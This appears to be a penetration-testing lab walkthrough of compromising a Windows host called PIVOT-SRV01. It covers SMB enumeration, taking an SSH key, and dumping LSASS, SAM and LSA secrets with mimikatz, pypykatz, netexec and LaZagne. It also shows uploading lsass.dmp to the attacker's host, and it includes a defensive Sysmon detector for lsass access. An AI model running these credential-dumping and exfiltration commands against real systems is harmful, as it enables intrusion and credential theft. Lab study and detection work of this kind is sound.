# Recon

- Ping test
![[images/Pasted image 20251023160120.png]]
- Light nmap scan
![[images/Pasted image 20251023160051.png]]
- ssh, smb, rdp, winrm services open
- Detailed nmap scan
![[images/Pasted image 20251023160323.png]]

# External Enum of PIVOT-SRV01

## `Netexec` scans

- Try some `nxc` scans with creds
- winrm and rdp not working
![[images/Pasted image 20251023160758.png]]
- smb not working
![[images/Pasted image 20251023160517.png]]
- Try with the `--local-auth` flag
    - That works!
![[images/Pasted image 20251023160728.png]]

## SMB Enum

- Smbclient to PIVOT-SRV01
![[images/Pasted image 20251023161034.png]]
- Looks like nothing in public
- SSH private key in `\mlefay\.ssh`
![[images/Pasted image 20251023161306.png]]
- Grab mlefay's id_rsa
![[images/Pasted image 20251023162008.png]]
- Move to loot folder, chmod 600, and rename to keep track
![[images/Pasted image 20251023162033.png]]

# Internal Enum of PIVOT-SRV01

- SSH into PIVOT-SRV01 as mlefay
- Privkey is password protected
![[images/Pasted image 20251023162213.png]]
- Try using the earlier password from the `for-admin-eyes-only` file
- We're in!
## Simple Enum

- Light enum
![[images/Pasted image 20251024101359.png]]
![[images/Pasted image 20251024101322.png]]
- Local admin privs
- Access to another subnet: 172.16.6.0/24

## Dump LSASS

- Get LSASS PID
![[images/Pasted image 20251024112937.png]]
- Dump LSASS
![[images/Pasted image 20251024113520.png]]
- Start SMB server on Kali host and move to share
![[images/Pasted image 20251024113848.png]]
![[images/Pasted image 20251024113858.png]]
- Not working because PIVOT-SRV01 is on the internal subnet
- We will need to move to pivot_A first or get `mimikatz` onto PIVOT-SRV01

### Technique for moving `lsass.dmp`

- Set up an upload server on the Kali host
- Forward requests from port 4444 on the webserver to port 8000 on the Kali host via the Ligolo tunnel

```bash
python3 -m uploadserver
```

- Move `PSUpload.ps1` to PIVOT-SRV01 and use it to upload `lsass.dmp` to the Kali host

```powershell
# Dot-source the script so Invoke-FileUpload is defined in this session
# (use Import-Module instead if necessary)
. .\PSUpload.ps1
Invoke-FileUpload -Uri http://172.16.5.15/upload -File C:\lsass.dmp
```

- Use `pypykatz` on the Kali host to extract NT hashes from `lsass.dmp`

```bash
pypykatz lsa minidump lsass.dmp
```

### Technique for remotely grabbing SAM, LSA secrets, and LSASS

```bash
# <target-ip> is a placeholder for the host to query (not in the original notes)
sudo nxc smb <target-ip> -u mlefay -p <password> -d inlanefreight.local --sam
sudo nxc smb <target-ip> -u mlefay -p <password> -d inlanefreight.local --lsa
sudo nxc smb <target-ip> -u mlefay -p <password> -d inlanefreight.local -M lsassy
```

## Mimikatz

- Move `mimikatz` onto PIVOT-SRV01
- Transfer `mimikatz.exe` to pivot_A with `scp`
![[images/Pasted image 20251024114357.png]]
- Serve up `mimikatz.exe` from pivot_A
![[images/Pasted image 20251024114436.png]]
- Download `mimikatz.exe` on PIVOT-SRV01
![[images/Pasted image 20251024114633.png]]
- Run `mimikatz.exe`
![[images/Pasted image 20251024115318.png]]
- Run `sekurlsa::credman`
    - New username: vfrank
- Run `sekurlsa::tickets /export`
- Run `sekurlsa::minidump C:\path\lsass.dmp`
- Run `sekurlsa::logonPasswords`
![[images/Pasted image 20251024131124.png]]
- We have an NT hash and plaintext password for vfrank
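Every step in the two sections above (the manual dump, `sekurlsa::minidump`, `lsassy`) opens a read handle on `lsass.exe`, and that handle open is exactly what Sysmon records as a ProcessAccess event (Event ID 10). The detector below is an added example, not part of these notes: it runs over constructed sample records (a simplified `Key=Value|Key=Value` form using Sysmon's field names) and flags lsass.exe handle opens from non-baseline processes that request PROCESS_VM_READ; the allow-list is an assumption to tune per environment.

```python
"""Flag lsass.exe handle opens in Sysmon ProcessAccess (Event ID 10) records.
Added defensive example, not from the original notes. Records are constructed
samples in a simplified Key=Value|Key=Value form using Sysmon's field names."""
from typing import Dict, List

# Processes that routinely open lsass.exe on a healthy host (an assumed
# baseline for this example; tune per environment).
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}
# PROCESS_VM_READ: every memory dumper (mimikatz, procdump, Task Manager) needs it.
PROCESS_VM_READ = 0x0010


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed 'Key=Value|...' record into a dict."""
    return dict(kv.split("=", 1) for kv in line.strip().split("|"))


def is_suspicious_lsass_access(ev: Dict[str, str]) -> bool:
    """Event 10, target lsass.exe, non-baseline source, read-capable mask."""
    if ev.get("EventID") != "10":
        return False
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    if ev.get("SourceImage", "").lower() in ALLOWED_SOURCES:
        return False
    granted = int(ev.get("GrantedAccess", "0x0"), 16)  # Sysmon renders e.g. "0x1010"
    return bool(granted & PROCESS_VM_READ)


def find_lsass_access(lines: List[str]) -> List[str]:
    """Return the SourceImage of every suspicious lsass.exe access, in order."""
    return [ev["SourceImage"] for ev in map(parse_event, lines)
            if is_suspicious_lsass_access(ev)]


# Constructed sample log: a baseline access, an unrelated event, two dump
# attempts, and a full-access handle to a process that is not lsass.
SAMPLE_LOG = [
    r"EventID=10|SourceImage=C:\Windows\System32\svchost.exe|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x1000",
    r"EventID=1|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe",
    r"EventID=10|SourceImage=C:\Users\mlefay\Desktop\mimikatz.exe|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x1010",
    r"EventID=10|SourceImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x1FFFFF",
    r"EventID=10|SourceImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|TargetImage=C:\Windows\System32\notepad.exe|GrantedAccess=0x1FFFFF",
]
```

Running `find_lsass_access(SAMPLE_LOG)` returns the mimikatz and powershell source paths and nothing else; in production the same rule would be fed from the Sysmon operational log rather than the inline samples.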
## LaZagne

- Stage `lazagne.exe` on pivot_A and move to PIVOT-SRV01
![[images/Pasted image 20251024125033.png]]
- Run `lazagne.exe`
![[images/Pasted image 20251024130830.png]]
- We have an NT hash for new user apendragon
- Try using it to pass-the-hash?